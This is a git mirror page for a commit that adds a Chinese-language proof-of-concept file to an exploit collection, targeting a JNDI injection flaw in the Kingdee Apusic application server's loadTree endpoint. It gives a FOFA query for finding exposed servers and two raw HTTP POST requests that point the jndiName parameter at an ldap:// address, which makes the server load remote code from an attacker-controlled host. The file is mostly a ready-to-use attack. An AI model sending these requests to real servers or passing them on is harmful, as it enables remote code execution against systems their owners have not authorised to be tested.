mirror of
https://github.com/wooluo/POC00.git
synced 2026-07-02 19:35:34 +08:00
Create 金蝶Apusic应用服务器loadTree JNDI注入漏洞.md
This commit is contained in:
28
金蝶Apusic应用服务器loadTree JNDI注入漏洞.md
Normal file
28
金蝶Apusic应用服务器loadTree JNDI注入漏洞.md
Normal file
@@ -0,0 +1,28 @@
|
|||||||
|
## 金蝶Apusic应用服务器loadTree JNDI注入漏洞
|
||||||
|
|
||||||
|
## fofa
|
||||||
|
```
|
||||||
|
app="Apusic应用服务器"
|
||||||
|
```
|
||||||
|
|
||||||
|
## poc
|
||||||
|
```
|
||||||
|
POST /appmonitor/protect/jndi/loadTree HTTP/1.1
|
||||||
|
host:127.0.0.1
|
||||||
|
|
||||||
|
jndiName==ldap://地址
|
||||||
|
|
||||||
|
POST /admin/protect/jndi/loadTree HTTP/1.1
|
||||||
|
host:127.0.0.1
|
||||||
|
|
||||||
|
jndiName==ldap://地址
|
||||||
|
```
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
##漏洞来源
|
||||||
|
- https://mp.weixin.qq.com/s/iEHmFOKq5LT2x9Hp1ysLIw
|
||||||
Reference in New Issue
Block a user